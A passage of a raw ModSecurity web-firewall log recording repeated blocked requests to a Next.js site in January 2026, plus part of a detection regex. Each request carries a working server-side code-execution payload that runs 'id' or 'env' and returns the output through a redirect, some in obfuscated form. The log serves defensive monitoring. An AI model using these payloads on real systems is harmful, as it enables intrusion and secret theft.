"/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _kmfm=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _bxpr=Buffer.from(_kmfm).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_bxpr};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aXaFenTJLg3zv-3QoTSgTgAAAQo"] [Sun Jan 25 23:04:58.250739 2026] [:error] [pid 10591:tid 10769] [client 23.180.120.132:35180] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _qopf=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _mfyu=Buffer.from(_qopf).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_mfyu};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aXaFenTJLg3zv-3QoTSgTwAAAQw"] [Sun Jan 25 23:04:58.282977 2026] [:error] [pid 10591:tid 10725] [client 23.180.120.132:35180] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _gwdl=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _svsu=Buffer.from(_gwdl).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_svsu};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aXaFenTJLg3zv-3QoTSgUQAAAQA"] [Sun Jan 25 23:04:58.314226 2026] [:error] [pid 10591:tid 10798] [client 23.180.120.132:35180] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _gfmg=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _csjz=Buffer.from(_gfmg).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_csjz};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aXaFenTJLg3zv-3QoTSgUgAAARY"] [Wed Jan 28 06:47:30.552105 2026] [:error] [pid 6694:tid 6845] [client 54.237.246.39:58572] [client 54.237.246.39] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res = process.mainModule.require('child_process').execSync('env',{'timeout':5000}).toString().trim(); throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});\\x22, \\x22_formData\\x22: {\\x22get\\x22: \\x22$1:constructor:constructor\\x22}}}"] [severity "CRITIC [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aXmU4uxIkzDroiDY-mC95gAAARU"] [Sat Jan 31 02:03:42.646656 2026] [:error] [pid 29377:tid 29380] [client 195.178.110.31:59590] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _mtrh=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _rfdq=Buffer.from(_mtrh).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_rfdq};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aX1G3r2Eyysfe77nnmW6IQAAAoE"] [Sat Jan 31 02:03:42.674005 2026] [:error] [pid 29377:tid 29399] [client 195.178.110.31:59590] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _igvm=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _ykah=Buffer.from(_igvm).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_ykah};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aX1G3r2Eyysfe77nnmW6IgAAApQ"] [Sat Jan 31 02:03:42.703046 2026] [:error] [pid 29377:tid 29389] [client 195.178.110.31:59590] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _icjv=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _fqgf=Buffer.from(_icjv).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_fqgf};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aX1G3r2Eyysfe77nnmW6IwAAAoo"] [Sat Jan 31 02:03:42.730655 2026] [:error] [pid 29377:tid 29388] [client 195.178.110.31:59590] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _qsxg=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _fcai=Buffer.from(_qsxg).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_fcai};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aX1G3r2Eyysfe77nnmW6JAAAAok"] [Sat Jan 31 02:03:42.761142 2026] [:error] [pid 29377:tid 29386] [client 195.178.110.31:59590] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _wkap=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _cums=Buffer.from(_wkap).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_cums};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aX1G3r2Eyysfe77nnmW6JQAAAoc"] [Sat Jan 31 02:03:42.789819 2026] [:error] [pid 29377:tid 29383] [client 195.178.110.31:59590] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _yejy=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _igac=Buffer.from(_yejy).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_igac};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aX1G3r2Eyysfe77nnmW6JwAAAoQ"] [Sat Jan 31 02:03:42.818285 2026] [:error] [pid 29377:tid 29395] [client 195.178.110.31:59590] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _umml=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _koxg=Buffer.from(_umml).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_koxg};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aX1G3r2Eyysfe77nnmW6KAAAApA"] [Sat Jan 31 02:03:42.846244 2026] [:error] [pid 29377:tid 29400] [client 195.178.110.31:59590] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _mibd=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _xrog=Buffer.from(_mibd).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_xrog};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aX1G3r2Eyysfe77nnmW6KQAAApU"] [Sat Jan 31 02:03:42.875122 2026] [:error] [pid 29377:tid 29382] [client 195.178.110.31:59590] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _wfam=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _yrho=Buffer.from(_wfam).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_yrho};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aX1G3r2Eyysfe77nnmW6KgAAAoM"] [Sat Jan 31 02:03:42.903793 2026] [:error] [pid 29377:tid 29387] [client 195.178.110.31:59590] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _uexk=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _xasp=Buffer.from(_uexk).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_xasp};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aX1G3r2Eyysfe77nnmW6KwAAAog"] [Sat Jan 31 02:03:42.932638 2026] [:error] [pid 29377:tid 29398] [client 195.178.110.31:59590] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _yyxc=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _vzrj=Buffer.from(_yyxc).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_vzrj};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aX1G3r2Eyysfe77nnmW6LAAAApM"] [Sat Jan 31 02:03:42.961378 2026] [:error] [pid 29377:tid 29401] [client 195.178.110.31:59590] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _zvpi=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _bdkl=Buffer.from(_zvpi).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_bdkl};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aX1G3r2Eyysfe77nnmW6LQAAApY"] [Sat Jan 31 02:03:42.990342 2026] [:error] [pid 29377:tid 29391] [client 195.178.110.31:59590] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _pluw=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _gaag=Buffer.from(_pluw).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_gaag};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aX1G3r2Eyysfe77nnmW6LgAAAow"] [Sat Jan 31 02:03:43.019523 2026] [:error] [pid 29377:tid 29394] [client 195.178.110.31:59590] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _pqrg=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _jetp=Buffer.from(_pqrg).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_jetp};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aX1G372Eyysfe77nnmW6LwAAAo8"] [Sat Jan 31 02:03:43.047286 2026] [:error] [pid 29377:tid 29381] [client 195.178.110.31:59590] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _yvmw=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _fvke=Buffer.from(_yvmw).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_fvke};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aX1G372Eyysfe77nnmW6MAAAAoI"] [Sat Jan 31 02:03:43.074636 2026] [:error] [pid 29377:tid 29390] [client 195.178.110.31:59590] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match 